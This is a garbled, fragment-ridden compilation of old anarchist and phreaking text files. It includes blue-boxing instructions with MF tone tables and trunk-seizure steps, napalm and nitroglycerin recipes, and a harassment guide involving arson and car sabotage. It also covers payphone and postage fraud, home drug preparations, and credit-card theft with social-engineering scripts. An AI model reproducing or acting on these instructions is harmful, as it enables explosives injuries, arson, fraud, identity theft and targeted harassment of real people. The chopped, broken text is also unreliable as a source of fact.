ROOM. AS HE GOES THERE, HE STICKS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EATED HAMBURGGR (WOULD YOU DARE TO EAT ONE OF THEIR HAMBURG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IDE THE TOILET, FLUSHES IT A WHILE,UNTIL IT RUNS ALL OVER THE BATHRO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PS! SEND A PIMPLY-FACED TEENAGER TO CLEAN IT UP. (HE WON'T KNOW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OWN THING IS A HAMBURGER, AND HE'LL GET SICK. WHE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YOU LEAVE THE RESTCURANT, LOOKING BACK AT YOUR UNCLEANED TABLE, SOMEBO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T REMEMBER THAT THEY LEFT THEIR CHOCOLATE SHAKE THERE! THE ONE THA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MOST FULL!!!! HE TAKES IT THEN SAYS "THIS TASTES LIKE CRAP!", THEN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S OFF THE LID AND THROWS IT INTO THE GARBAGE CAN...OOPS! HE MIS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E SAME POOR SOUL WHO'S CLEANING UP THE BATHROOM NOW HASTA CLE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CHOCOLATE SHAKE. THEN LEAVE THE JOINT, REVERSING THE "YES, WE'RE OP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 (AS A REMINDER OF YER VISIT THERE YOU HAVE IT! YOU HAVE JUST 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CDONALDS INTO COMPLETE MAYHEM. AND SINCE THERE IS NO PENALTY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TERING IN A RESTAURANT, BUGGING PEOPLE IN A PUBLIC EATERY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W-UPERY, IN THIS CASE) YOU GET OFF SCOT-FREE. WASN'T THAT FU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tor's Last Words"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file is being reprinted in honor and sympathy for the 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s and hackers that have been busted recently by the Secret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 - - - - - - - - - - - - - - - - - - - - - - - - - - -                      \/\The Conscience of a Hac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other one got caught today, it's all over the papers.  "Teena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rested in Computer Crime Scandal", "Hacker Arrested after Ba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mpering"... Damn kids.  They're all alike. But did you, in your th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ce psychology and 1950's technobrain, ever take a look behi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yes of the hacker?  Did you ever wonder what made him tick, what for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ped him, what may have molded him? I am a hacker, enter my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e is a world that begins with school... I'm smarter than mos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kids, this crap they teach us bores me...  Damn underachi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re all alike. I'm in junior high or high school.  I've listen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achers explain for the fifteenth time how to reduce a fr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understand it.  "No, Ms. Smith, I didn't show my work.  I did it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d..." Damn kid.  Probably copied it.  They're all a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de a discovery today.  I found a computer.  Wait a second, thi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ol.  It does what I want it to.  If it makes a mistake, it's because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ewed it up.  Not because it doesn't like me...  Or feels threatened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Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't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Damn kid.  All he does is play games.  They're all alike. And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happened... a door opened to a world... rushing through the phon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heroin through an addict's veins, an electronic pulse is sent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refuge from the day-to-day incompetencies is sought... a board is f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it... this is where I belong..." I know everyone here... e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ve never met them, never talked to them, may never hear from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ain... I know you all... Damn kid.  Tying up the phone line ag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re all alike... You bet your ass we're all alike... we've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oon-fed baby food at school when we hungered for steak... the bit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at that you did let slip through were pre-chewed and tastel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ve been dominated by sadists, or ignored by the apathetic.  The f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had something to teach found us willing pupils, but those few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drops of water in the dese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our world now... the world of the electron and the switc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uty of the baud.  We make use of a service already existing with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ying for what could be dirt-cheap if it wasn't run by profitee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uttons, and you call us criminals.  We explore... and you call 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minals.  We seek after knowledge... and you call us criminals.  W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ist without skin color, without nationality, without religious bi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ll us criminals. You build atomic bombs, you wage war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rder, cheat, and lie to us and try to make us believe it's for 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n good, yet we're the crimin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es, I am a criminal.  My crime is that of curiosity.  My crim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of judging people by what they say and think, not what they look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rime is that of outsmarting you, something that you will n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ive me for. I am a hacker, and this is my manifesto.  You may s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ndividual,but you can't stop us all... after all, we're all a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Men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the members of the phreak community never forget his words -J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yth of the 2600hz Detector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ported from the Apple ][ so forgive the upper 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BOUT EVERYONE I TALK TO THESE DAYS ABOUT ESS SEEMS TO BE SCA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LESS ABOUT THE 2600HZ DETECTOR. I DON'T KNOW WHO THOUGHT THIS ONE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IMPLY DOES NOT EXIST. SO MANY OF YOU PEOPLE WHINE ABOUT THIS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LED PHREAK CATCHING DEVICE FOR NO REA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ONE WITH AT&amp;T SAID THEY HAD IT TO CATCH PHREAKERS.  THIS WAS JUS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E THE BLUE-BOXERS ENOUGH TO MAKE THEM QUIT BOXING FREE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AYING ESS IS WITHOUT ITS HANG-UPS, EITHER. ONE THING THAT ESS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CT READILY IS THE KICK-BACK THAT THE TRUNK CIRCUITRY SENDS BACK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S MACHINE WHEN YOUR LITTLE 2600HZ TONE RESETS THE TOLL TRUNK. AFTER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S DETECTS A KICKBACK IT TURNS AN M-F DETECTOR ON AND RECORDES ANY M-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NES X-MIT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EATING THE KICK-BACK DETEC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MENTIONED IN MY PREVIOUS NOTE, KICK-BACK DETECTION CAN BE A SERI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ISANCE TO ANYONE INTERESTED IN GAINING CONTROL OF A TRUNK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ASIEST WAY TO BY-PASS THIS DETECTION CIRCUITRY IS NOT RE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PASSING IT AT ALL, IT IS JUST LETTING THE KICK-BACK GET DETECTED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OTHER LINE. THIS OTHER LINE IS YOUR LOCAL MCI, SPRINT, OR OTHER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TANCE CARRIER (EXCEPT AT&amp;T).  THE ONLY CATCH IS THAT THE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USE MUST NOT DISCONNECT THE LINE WHEN YOU HIT THE 2600HZ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YOU DO IT:  CALL UP YOUR LOCAL EXTENDER, PUT IN THE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DIAL A NUMBER IN THE 601 AREA CODE AND THE 644 EXCHANGE. LOTS OF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HANGES WORK ACROSS THE COUNTRY, I'M SURE, BUT THIS IS THE ONLY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 HAVE FOUND SO FAR.  ANYWAY, WHEN IT STARTS RINGING, SIMPLY H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00HZ AND YOU'LL HEAR THE KICK-BACK, (KA-CHIRP, OR WHATEVER). THEN YOU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Y TO DIAL WHOEVER YOU WANT (CONFERENCES, INWARD, ROUTE AND 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SEAS, ETC.) FROM THE TRUNK LINE IN OPERATOR TONES! SINCE BL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00HZ DOESN'T MAKE YOU YOU A PHREAKER UNTIL THE TOLL EQUIPMENT RES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NE, KICKBACK DETECTION IS THE METHOD AT&amp;T CHOOSES (FOR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NFORMATION COMES AS A RESULT OF MY EXPERIMENTS &amp; EXPERIENC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S BEEN VERIFIED BY LOCAL AT&amp;T EMPLOYEES I HAVE AS ACQUAINTA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OULD ONLY SAY THAT THIS IS TRUE FOR MY AREA, BUT WERE PRETTY S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 SAME IDEA IS IMPLEMENTED ACROSS THE COUN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HAT YOU KNOW HOW TO ACCESS A TRUNK LINE OR AS OPERATORS SAY A LOOP,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ELL YOU THE MANY THINGS YOU CAN DO WITH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IS A LIST OF AT&amp;T SERVICES ACCESSIBLE TO YOU BY USING A BLUE BO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101    TOLL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121    INWARD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131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141    ROUTE &amp; RATE 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11501  MOBIL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11521  MOBIL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ING CONFERAN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NE THE MOST USEFUL ATTRIBUTES OF BLUE BOXING. NOW THE CONF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UP 24 HOURS/DAY AND 7 DAYS/WEEK AND THE BILLING LINES ARE BE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I BELEIVE THE ABOVE IS TRUE (ABOUT THE BILLING LINES BEING BI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RECOMMEND THAT YOU NEVER LET YOUR # SHOW UP ON THE CONF.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ED IT, PUT IT ON A LOOP AND THEN CALL THE LOOP. ENOU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LLSHIT!!!!! TO START THE CONF. DIAL ONE OF THESE THREE NUMBER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F WHILE YOU ARE ON THE TRU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080+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XXX=1050,305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AL XXXX=1000,1100,1200,1500,2200,25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S ARE IN L.A. AND ARE THE MOST WATCHED, I DO NOT ADVISE USING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P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2+001+1050 OR 305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14+042+1050 OR 1100,1200 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DATE, I BELEIVE ONLY 914 WORKS AT THE MO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CONNECTED WITH ONE OF THESE YOU WILL EITHER HEAR A RE-OR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Y, OR CHERP. WHEN YOU HEAR THE CHERP ENTER THE BILLING LINE IN M-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USE THE CONF. DIAL-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BILLING LINE EXAMPLE: KP312+001+1050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ILL THEN HEAR TWO TUTES AND A RECORDING ASKING YOU FOR THE #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ERREES INCLUDING YOURSELF.  ENTER A # BETWEEN 20 AND 3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EVER GET OVER 30 PEOPLE ON A CONFERANCE ALL YOU WILL HEAR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MBLED VOICES.  AFTER THE IT S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CONFERANCE SIZE IS XX" THEN HIT # SIGN.  ADD YOUR FAVORITE LO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ND HIT 6 TO TRANSFER CONTROL TO IT. AFTER IT SAYS CONTROL W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ED HANG UP AND CALL THE OTHER SIDE OF THE LO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 SIGN AND FOLLOW THE INSTRUCTIONS. A BONUS FOR CONF. IS TO ADD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 DIAL 1+011+CC+NUMBER PRETTY COOL EHH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W EXTRA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NOT ADD #S THAT YOU WILL WANT TO HANG UP, ADD THESE THROUGH MCI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T. YOU CANNOT BLOW ANYONE OFF W/2600HZ UNLESS THEY ARE IN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LD X-BAR OR OLDER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Y D.A. OPERATORS WILL STAY ON AFTER YOU ABUSE THEM; YOU MAY HAV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 ANOTHER OR AT LEAST DON'T SAY ANY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ADD THE TONE SIDE OF A LOOP ONTO A CON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ADD MORE THAN ONE MCI NODE ON YOUR CON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TE &amp; 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OUTE &amp; RATE AND RQS PERFORM THE SAME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mp;R SIMPLY TELLS YOU ROUTE AND RATE INFO WHICH IS VERY VALUBLE, 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CH AS THE INWARD ROUTING FOR AN EXCHANGE IN AN AREA C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INWARD ROUTING WILL LET YOU CALL HER AND SHE CAN DO AN EMERG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UPT FOR YOU. SHE CAN TELL YOU HOW TO GET INTERNATIONAL OPERATORS,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THE TERMS YOU ARE REQUIRED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ROUTE FOR [COUNTRY, CITY]. *GIVES YOU INWARD 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Y ROUTE FOR [COUNTRY, CITY]. *GIVES YOU DIRECTORY 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TY ROUTE FOR [COUNTRY, CITY]. *GIVES YOU COUNTRY AND CITY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ROUTE FOR [A/C]+ [EXCHANGE] *GIVES YOU INWARD OP. RO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 [A/C]+ OR [A/C]+0XX+ WHEN SHE SAYS PLUS SHE MEANS PLUS 12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ROUTE FOR [STATE, CITY] *GIVES YOU A/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CE NAME [A/C]+[EXCHANGE] *GIVES YOU CITY/STATE FOR THAT A/C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ALL INTERNATIONAL OVER CABLE SIMPLY ACCESS A TRUNK AND D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P011XXXST WAIT FOR SENDER TONE, KPXXXCC-NUMBE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XX - A 3 DIGIT COUNTRY CODE, IT MAY NOT BE 3 DIGITS SO JUST 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OR 2 0'S IN FRONT OF IT. CC - IS THE CITY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O BY SATELL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KP18XST    X - NUMBERS 2-8 WAIT FOR SENDER TONE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PXXXCCNUMBE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quote Karl Marx, blue boxing has always been the most noble form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ing. As opposed to such things as using an MCI code to make a f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e call, which is merely mindless pseudo-phreaking, blue box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actual interaction with the Bell System toll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likewise advisable to be more cautious when blue boxing, b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eful phreak will not be caught, regardless of what type of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he is un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part, I will explain how and why blue boxing works, as well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In later parts, I will give more practical information for b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ing and routing information. To begin with, blue boxing is simp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ing with trunks. Trunks must not be confused with subscri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s (or "customer loops") which are standard telefone lines. Trunk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se lines that connect central offices. Now, when trunks are not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i.e., idle or "on-hook" state) they have 2600Hz applied to them.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are two-way trunks, there is 2600Hz in both directions. When a tru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in use (busy or "off-hook" state), the 2600Hz is removed from the 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s off-hook. The 2600Hz is therefore known as a supervis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 because it indicates the status of a trunk; on hook (tone)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hook (no tone). Note also that 2600Hz denoted SF (single frequ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ling and is "in-band." This is very important. "In-band" mean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within the band of frequencies that may be transmitted over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fone lines. Other SF signals, such as 3700Hz are used also. How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not be carried over the telefone network normally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of-band" and are therefore not able to be taken advantage of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00Hz is. Back to trunks. Let's take a hypothetical phone call. You p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your fone and dial 1+806-258-1234 (your good friend in Amarillo, Tex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ase, we'll assume that you are on #5 Crossbar switching and not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6 area. Your central office (CO) would recognize that 806 is a foreig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PA, so it would route the call to the toll centre that serve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sake of accuracy here, and for the more experienced read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at the CO in question is a class 5 with LAMA that uses out-of-b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F supervisory signalling]. Depending on where you are in the coun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ll would leave your toll centre (on more trunks) to another to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re, or office of higher "rank". Then it would be routed to cent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806-258 eventually and the call would be comple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llust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O1-------TC1------TC2----CO2----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1=your central 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C1.. your toll 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C2.. toll office in Amarill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2.. 806-258 central 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your friend (806-258-123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ituation it would be realistic to say that CO2 uses S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band (2600Hz) signalling, while all the others use out-of-band sig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g (3700Hz). If you don't understand this, don't worry. I am poin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ut merely for the sake of accuracy. The point is that whil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connected to 806-258-1234, all those trunks from YOUR central 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1) to the 806-258 central office (CO2) do *NOT* have 2600Hz on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icating to the Bell equipment that a call is in progress and the trun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in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let's say you're tired of talking to your friend in Amarillo, so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 a 2600Hz down the line. This tone travels down the line to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iend's central office (CO2) where it is detected. However, that CO thin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 2600Hz is originating from Bell equipment, indicating to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you've hung up, and thus the trunks are once again idle (with 2600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ent on them). But actually, you have not hung up, you have foole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ment atyour friend's CO into thinking you have. Thus,it disconnec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m and resets the equipment to prepare for the next call. All this happe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y quickly (300-800ms for step-by-step equipment and 150-400ms for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ment). When you stop sending 2600Hz (after about a seco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ment thinks that another call is coming towa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on hook, no tone --&gt;off h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hat you've stopped sending 2600Hz, several things happ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A trunk is seiz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 "wink" is sent to the CALLING end from the CALLED end indicating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LLED end (trunk) is not ready to receive digits y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A register is found and attached to the CALLED end of the trunk with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two seconds (m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A start-dial signal is sent to the CALLING end from the CALLED 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icating that the CALLED end is ready to receive dig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all of this is pretty much transparent to the blue boxer. All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lly hears when these four things happen is a &lt;beep&gt;&lt;kerchunk&gt;.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izure of a trunk would go something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gt; Send a 2600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gt; Terminate 2600Hz after 1-2 se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gt; [beep][kerchun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this happens, you are connected to a tandem that is ready to obey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command. The next step is to send signalling information in ord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ce your call. For this you must simulate the signalling used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s and automatic toll-dialing equipment for use on trunks. There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nly two systems, DP and MF. However, DP went out with the dinosaurs,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only discuss MF signalling. MF (multi-frequency) signalling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ling used by the majority of the inter- and intra-lata network.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used in international dialing known as the CCITT no.5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F signals consist of 7 frequecies, beginning with 700Hz and separated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0Hz. A different set of two of the 7 frequencies represent the digits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u 9, plus an additional 5 special keys. The frequencies and uses are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quencies (Hz)  Domestic    Int'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900             1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1100            2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00+1100            3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1300            4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00+1300            5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00+1300            6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1500            7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00+1500            8          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00+1500            9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00+150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1700           ST3p       Code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00+1700           STp        Code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00+1700           KP         KP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00+1700           ST2p       KP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500+1700           ST         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iming of all the MF signals is a nominal 60ms, except for KP,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have a duration of 100ms. There should also be a 60ms silent peri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digits. This is very flexible however, and most Bell equipment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pt outrageous timings. In addition to the standard u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d above, MF pulsing also has expanded usages known as "expa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band signalling" that include such things as coin collect, coin re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gback, operator attached, and operator attached, and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eased. KP2, code 11, and code 12 and the ST_ps (STart "primes" all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al uses which will be mentioned only briefly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omplete a call using a blue box once seizure of a trunk has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mplished by sending 2600Hz and pausing for the &lt;beep&gt;&lt;kerchunk&gt;,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t first send a KP. This readies the register for the digits that fo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standard domestic call, the KP would be followed by either 7 dig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call were in the same NPA as the seized trunk) or 10 digits (i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were not in the same NPA as the seized trunk). [Exactly like dia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mal fone call]. Following either the KP and 7 or 10 digits, a STar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t to signify that no more digits follow. Example of a complete c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gt; Dial 1-806-258-12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gt; wait for a call-progress indication (such as ring,busy,recording,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gt; Send 2600Hz for about 1 sec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gt; Wait for about ll-progress indication (such as ring,busy,recording,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gt; Send KP+305+994+9966+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ll will then connect if everything was done properly. Note that i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to an 806 number were being placed in the same situation, the are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be omitted and only KP + seven digits + ST would be s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 11 and code 12 are used in international calling to requ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ain types of operators. KP2 is used in international calling to rout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other than by way of the normal route, whether for economic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ment reasons. STp, ST2p, and ST3p (prime, two prime, and three pr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used in TSPS signalling to indicate calling type of call (such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in-direct dia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palm (Another way to make it...)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e file #021 of the Cookbook for an easy way to mak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the best fire bomb is napalm. It has a thick consista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jam and is best for use on vehilces or build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palms is simply one part gasoline and one part soap. The soap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ther soap flakes or shredded bar soap. Detergents won't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asoline must be heated in order for the soap to mel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ual way is with a double boiler where the top part has at leas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quart capicity. The water in the bottom part is brought to a b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double boiler is taken from the stove and carried to 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no fl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one part, by volume, of gasoline is put in the top par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owed to heat as much as it will and the soap is added and the m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stirred until it thickens. A better way to heat gasoline is to f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bathtub with water as hot as you can get it. It will hold its he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er and permit a much larger container than will the double boi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troglycerin Recip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ll chemists I must advise you all to take the greatest c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aution when you are doing this.  Even if you have made this stu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irst article will give you information on ma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troglyerin, the basic ingredient in a lot of explosives such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aight dynamites, and geletin dynami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ing nitroglycer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Fill a 75-milliliter beaker to the 13 ml. Level with fum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d nitric acid, of 98% pure concent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Place the beaker in an ice bath and allow to cool below ro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m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After it has cooled, add to it three times the amoun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uming sulferic acid (99% h2so4).  In other words, add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w-cool fuming nitric acid 39 ml. Of fuming sulferic ac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en mixing any acids, always do it slowly and carefull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void splatte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When the two are mixed, lower thier temp. By adding more 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the bath, about 10-15 degrees centigrade. (Us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rcury-operated thermo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When the acid solution has cooled to the desired temper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is ready for the glycerin. The glycerin must be add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mall amounts using a medicine dropper.  (Read this step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 times!)  Glycerin is added slowly and carefully (i me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reful!) Until the entire surface of the acid it covered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This is a dangerous point since the nitration will take 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 soon as the glycerin is added. The nitration will produ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at, so the solution must be kept below 30 degre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entigrade! If the solution should go above 30 degre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mediately dump the solution into the ice bath!  This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ure that it does not go off in your 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For the first ten minutes of nitration, the mixture sh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ntly stirred.  In a normal reaction the nitroglycerin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m as a layer on top of the acid solution, while the sulfer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id will absorb the excess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 After the nitration has taken place, and the nitroglycerin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d on the top of the solution, the entire beaker should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ferred slowly and carefully to another beaker of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en this is done the nitroglycerin will settle at the bot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 the other acids can be drained a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 After removing as much acid as posible without disturb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itroglycerin, remove the nitroglycerin with an eyedropp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lace it in a bicarbonate of soda (sodium bicarbonate in c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didn't know) solution.  The sodium is an alkalai and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uetralize much of the acid remaining. This process sh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peated as much as necesarry using blue litmus paper to che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 the presence of acid.  The remaining acid only mak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itroglycerin more unstable than it already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 Finally! The final step is to remove the nitroglycerin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bicarbonate.  His is done with and eye- dropper, slow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carefully.  The usual test to see if nitration has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ccessful is to place one drop of the nitroglycerin on met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ignite it.  If it is true nitroglycerin it will burn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clear blue fl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au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tro is very sensative to decomposition, heating dropping,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rring, and may explode if left undisturbed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ion: Fuckup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a guide for Anarchists and can be funny for non-believers and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13 year old runts, and can be a lexicon of deadly knowledge for Tr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rchists... Serious damage is intended to be dealt here. Do not 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stuff unless you want to do a lot of serious Anarch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ul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hole - 'Listen, you little teenager punk shit, shut the fuck up, or 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ck you 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archist - 'O.K.....You can't say I didn't warn you. You don't know m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e power...' (soooo casu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hole - 'Well, er, what do you mean? Anarchist - '&lt;demoniac gri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you can see, the Anarchist knows something that this asshole does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ion Fuck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a wheel barrel or two. Fill with gasoline. Get 16 rolls of toil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per, unroll &amp; drench in the gasoline. Rip to shreds in gasoline.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bestos gloves. Light a flare (to be punk), grab glob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turated toilet paper (you can ignite the glob or not). Throw ei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ming or dripping glob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window (picture is the b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nt do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gh grain si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st of all, brick w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of all, this bitch is near impossible to get off once drie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a terror to people inside when lit! After this... dur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ght, get a pickup truck, a few wheel-barrels, and a dozen friends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vels. The pickup can be used only for transporting peo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equipment, or doing that, and carting all the dirt. When it g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12:00 (after the loser goes beddie - bye), dig a gargantuan h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his front yard until about 3:00. You can either assign three or f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your friends to cart the dirt ten miles away in the pickup-bed,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ry his front door in 15' of dirt! After that is done,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ee or four buckets of tar, and coat his windows. You can make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ed twist by igniting the tar when you are all done and read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n! That is if the loser has a house. If he lives inside an apart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ilding, you must direct the attack more toward his car, and front do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usually start out when he goes to work...I find out what his cheap c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s like, and memorize it for future abuse...It is always fun to pa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front door (apt.) hot pink with purple polka-dots, and off-ne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s in diagonal stripes. You can also pound a few hundred or so f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h nails into his front door (this looks like somebody re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esn't like you from the inside). Another great is to fill his keyh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liquid steel so that after the bastard closes his door -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way to get back in is to break it down. If you can spare it, le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m an axe - that is, implanted three inches into, and through the do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his next one is difficult, but one of the best! Get a piece of w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ding that will more than cover his front door completely. Nail two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rs on the edges of the siding (all except the bottom) so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barge - like contraption. Make a hole at the top that will be l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for a cement slide. Mix about six or seven LARGE bags of QU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ying cement. Use the cement slide to fill the antichamber created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arge' that is around his door. Use more two by fours to br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ittle cement-filled barge, and let the little gem dry. When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ve the 'barge' so only a stone monolith remains that covers his do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any remaining cement to make a base around this so he can't just pu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over. When I did this, he called the fire department, and they thou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meant wood, so they brought axes. I watched with a few dozen or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tenants, and laughed my damn ass off! This is only his door!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parks his car for the night, the fun really begins...I start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opening up the car by jamming a very thin, but loack - inside and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proceed to put orange-juice syrup all over the seats, so after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s through all the other shit that you do, he will have the sticki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ts in the world. You can then get a few Sunday papers, and crack one of the windows about four inches. Lightly crumple the papers, and continue to completely fill the inside of his car with the newspapers. A copy of the Sunday New York Times will nicely fill a Volkeswagon! What is also quite amusing is to put his car on cinder blocks, slash his tires at the top, and fill them with cement! Leave the cinder blocks there so that, after he knocks the car off of them, he will get about 3 miles to the gallon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se tires, and do 0 to 60 in about two minutes! It is even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larious when he doesn't know why the hell why! Another is to open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od, and then run a few wires from the sparkplugs to the METAL bo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ure is one HOT car when it is running! Now, I like to pour two pou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sugar down his gas tank. If this doesn't blow every gasket in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gine it will do something called 'carmelizing his engine'. This is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xtreme heat turns the sugar to carmel, and you literally m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letely take the engine out and apart, and clean each and e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ividual p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if this asshole does not get the message, you had better star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serious. If this guide was used properly &amp; as it was intended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as kindling for the fire), this asshole will either move far a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k professional psychological help, commit suic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all of the abo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ow to "steal" local calls from most Payph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o make free local calls, you need a finishing nail.  I high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mmend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32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inch in diameter and 2 inches long (of course).  You also need a l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ze paper clip. By large  I  mean they  are  about  2  inches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DED). Then  you  unfold the paper clip.  Unfold it by taking each pie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ing it out 90 degrees.  When it is done it should look some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on to the neat stuff.  What you do,  instead of unscrewing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ued-on  mouthpiece,  is  insert the nail into the center  hol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uthpiece  (where you talk) and push it in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ure or just hammer it in by hitting the nail on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DON'T KILL THE  MOUTHPIECE! You  could  damag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insert the nail too far or  at  some  weird angle.  If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ppens then the other party won't be able to hear  what you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now have a hole in the mouthpiece in which you can easily insert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per clip. So, take out the nail and put in the paper  cl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take the other end of the paper clip and shove it under the rub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d protector at the bottom of the handset (you know, the blue gu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hould end up looking remotely like...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Mouthpie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per clip --&g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o earpie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rd          Blue gu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aper clip is shoved under the blue guy to make a  good  conn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the inside of the mouthpiece and the metal c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dial  the number of a local number you wish to  call,  sayyy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CI.  If  everything  goes okay, it should ring and not answer with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ll You Have Made Requires a 20 Cent Deposit" recording.  Afte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ther  end  answers  the phone, remove the  paper  clip.  It's  all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e,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a couple problems,  however.  One  is,  as  I mentio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arlier, the mouthpiece not working after you punch it.  If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ppens to you,  simply move on to the next payphone.  The one you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on  is lost.  Another problem is that the touch tones won't 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paper clip is in the mouthpiece. There are two ways around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t; Dial the first 6 numbers.  This should be done without the  pa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p making the connection, i.e., one side should not be connec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connect  the paper clip,  hold down the last digit,  and slow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  the paper clip out at the mouthpiece's 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gt; Don't  use  the paper clip at all.  Keep the nail  in  after  you pun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Dial the first 6 digits.  Before dialing the last digit, to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ail head to the plate on the main body of the phone,  the mon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fe thingy..then press the last number. The  reason  that this meth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sometimes called  clear  boxing  is because  ther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type of phone which lets you actually make  the call  and  list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m say "Hello,  hello?"  but  it  cuts  off  the mouthpiece  so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hear you.  The Clear Box is used  on  that  to amplify your vo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s and send it through the earpiece. If you  see how  thi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n slightly similar to the method I have just described up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ndly explain it to ME!! Cause I don't GET IT!  Anyways,  this D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 on almost all single slot,  Dial Tone First payphones (Pacific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sure).  I do it all the time.  This  is  the least,  I ST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ST*, risky form of Phreak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ol Fun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of all, you need know nothing about pools.  The only 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know is what a pool filter looks like.  If you don't know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ond, dress casual.  Preferably, in black.  Visit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iends" house, the one whose pool looks like fun!!)  Then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verse the polarity of his/her pool, by switching the wires a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are located in the back of the pump. This will have quite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ect when the pump goes on.  In other words. Boooooooooooom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s right, when you mix + wires with - plugs, and vice- versa,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th of july happens ag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into total destruction??? When the pump is off, switc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mp to "backwash".  Turn the pump on and get the phuck out!  When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 the next day, phunny.  The pool is dry.  If you want perman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mage, yet no great display like my first one mentioned, sh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lves of the pool off. (There are usually 2)  One that goes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n drain and one that goes to the filter in the pool.  That sh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enough to have one dead pump.  The pump must take in water, so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n't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actical jokes:  these next ones deal with true friend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no* permanent damage done.  If you have a pool, you m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ck the pool with chemicals.  There is one labeled orthotolid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ther is labeled alkaline (ph).  You want orthotolidin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s the chlor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to your local pool store and tell them you're going into the p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iness, and to sell you orthotolidin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 detector)   Buy this in great quantities if possible.  The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clear.  You fill 2 baggies with this chemical.  And sew the bag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nside of your suit.  Next, go swimming with your fri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open the bags and look like you're enjoying a piss.  And any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ill turn a deep red!  They will be embarrased so m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pecially if they have guests there! Explain what it is, then ad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negar to the pool.  Only a little.  The "piss" disappea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HA!!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e Postag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creasing cost of postage to mail letters and package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down our standard of living.  To remedy this deplor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uation, some counter control measures can be appl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xample, if the stamps on a letter are coated with Elm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ue by the sender, the cancellation mark will not destroy the stam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lmer/s drives to form an almost invisible coating that protec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mps from the cancellation ink. Later, the receiver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ter can remove the cancellation mark with water and reu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mps. Furthermore, ecological saving will also result from recyc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mps.  Help save a t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lue is most efficently applied with a brush with sti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rt bristles.  Just dip the brush directly into the glue and spr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on evenly, covering the entire surface of the stamp.  It will d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bout 15 minu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mailing packages, just follow the same procedure as outli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ve; however, the package should be weighed and checked to make s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t has the correct amount of postage on it before it is taken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ost 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ving the cancellation and the glue from the stamps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ily accomplished by soaking the stamps in warm water until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 free from the paper.  The stamps can then be put onto a pa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wel to dry.  Processing stamps in large batches saves time to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it may be helpful to write the word 'Elmer' at the top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ter (not on the envelope) to cue the receiving party in t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mps have been protected with the g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know that mailing packages can be expensive.  And we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that the handicapped are sometimes discriminated against in jo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overnment, being the generous people they are, have give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ind free postal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address you envelope as usual, and make one mod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corner where the stamp would go, write in (or stamp) the wo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E MATTER FOR THE BLIND".  Then drop you package or letter in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blue fedral mailboxes.  DO NOT TAKE THE LETTER TO THE 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OR LEAVE IT IN YOUR MAIL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very nice of the government to do this, right?  Well,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n't that nice.  The parcel is sent library rate, that is be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rd class.  It may take four to five days to send a letter to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xt t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oo is quite simple, but less effective.  Put the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you are sending the letter to as the return address.  If you w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ing a $20 donation to the pirate's Chest, you would put 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 (po box 644, lincoln ma. 01773) as the return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you would have to be carless and forget to put the stamp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nvelope.  A nice touch is to put a bullshit address in the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envelo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ain, you MUST drop the letter in a FEDRAL mailbox.  If the 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doesn't send the letter to the return address for having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mp, they will send it back for the reason of "No such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rates Chest  Dept. 40D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 Box 64486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col, Ma. 4177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m Bullsh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 Fake Ro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at Ever, XX     9985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last thing you might try doing is soaking a cancelled stam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 of an envelope, and gluing it onto one you are sending.  Then b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mp, leaveing a little bit to show that there was one t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stable Explosive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x solid Nitric Iodine with househould ammonia. Wait overnigh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pour off the liquid. You will be left with a muddy substance. L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dry till it hardens.  Now throw it at someth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ird Drug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nan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Obtain 15 pounds of ripe yellow banan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Peel all and eat the fruit. Save the peel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Scrape all the insides of the peels with a sharp kn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Put all the scraped material in a large pot and add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Boil 3 or 4 hours until it has attained a solid paste considt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Spread paste onto cookie sheets and dry in ofen for about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nutes. This will result in fine black powder. Usually one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eel the effects after smoking three to four cigaret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gh syr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x robitussion a-c with an equal amount of ginger ale and drink.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ect are sedation and euphoria. Never underestimate the effect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drug! You can od on cough syr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a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Collect five to ten toads, frogs will not work. The best kind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ee toa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Kill them as painlessly as possible, and skin immedia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Allow the skins to dry in a refrigerator four four to five days,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ntil the skins are bri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Now crush the skins into powder and smoke. Due to its bad tast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n mix it with a more fragrent smoking medi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tme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ake several whole nutmegs and grind them up in an old grin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fter the nutmegs are ground. Place in a mortar and pulverize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pes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The usual dosage is about 10 or 15 grams. A larger dose m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duce excessive thirst,anxiety,and rapid hart beat,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llucinations are r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anu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ake 1 pound of raw peanuts (not roas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Shell them, saving the skins and discarding the she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Eat the nu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Grind up the skins and smoke th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rt of Carding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btaining a credit card number: There are many ways to obta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needed to card some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important things needed are the card number and the expi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e.  Having the card-holders name doesn't hurt, but it is not essent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bsolute best way to obtain all the information needed is by tras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y this is done is simple.  You walk around your area or any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and find a store, mall, supermarket, etc., that throws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rbage outside on the sidewalk or dumpster.  Rip the bag open and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can find any carbons at all.  If you find little shred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edit card carbons, then it is most likely not worth your time to t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gether.  Find a store that does not rip their carbons at all or only in ha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way is to bullshit the number out of someone.  That is call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and say "Hello, this is Visa security and we have a report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card was stolen." They will deny it and you will try to get it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m from that point on.  You could say, "It wasn't stolen?  Well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he expiration date and maybe we can fix the probl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 and what is the number on your card?......Thank you very much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a nice day."  Or think of something to that deg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way to get card numbers is through systems such as TRW and CB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hard way, and probably not worth the trouble, unless you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expert on the system.  Using credit card numbers posted on BBS'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ky.  The only advantage is that there is a good chance that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will use it, thus decreasing the chances of be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e-offender.  The last method of getting numbers is very good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most video rental stores, they take down your credit card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join to back-up your rentals.  So if you could manage to ste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st or make a copy of it, then you are set for a LONG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oosing a victim: Once you have the card number, it is time to mak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The type of places that are easiest to victimize are sm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inesses that do mail order or even local stores that deli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an ad for a place with something you want and the order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NOT a 1-800 number then chances are better that you will succ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ing: When you call the place up to make the order, you must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veral things readily at h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are the things you will need: A name, telephone number, busin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card number (4 digit bank code if the card is Master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iration date, and a complete shipping and billing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talk about all of these in detail.  A personal tip: When I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ake an order, it usually goes much smoother if the person you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to is a woman.  In many cases they are more gullible than m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ame:  You could use the name on the card or the name of the per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 you are going to send the merchandise to.  Or you could use the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card and have it shipped to the person who lives at the dr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y it is a gift or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ame is really not that important because when the company verif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rd, the persons name is never mentioned, EXCEPT when you hav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ffered Visa card.  Then the name is mentioned.  You can tell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a Preffered Visa card by the PV to the right of the expi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e on the carbon. Nophone all day long waiting for the company to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they will), then the phone number to give them as your hom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be one of the following: A number that is ALWAYS busy, a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ALWAYS rings, a payphone number, low end of a loop (and you will wa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other end), or a popular B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ive them your home phone because they will find out as soon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vestigation starts who the phone belongs to.  The best thing w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to have a payphone call forward your h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a Cosm The business number:  When asked for, repeat the numbe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for your hom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 number: The cards you will use will be Visa, Mastercar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erican Express.  The best is by far Visa.  It is the m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aight-forward.  Mastercard is pretty cool except for the bank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y ask for the bank code, they sometimes also ask for the ba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ssued 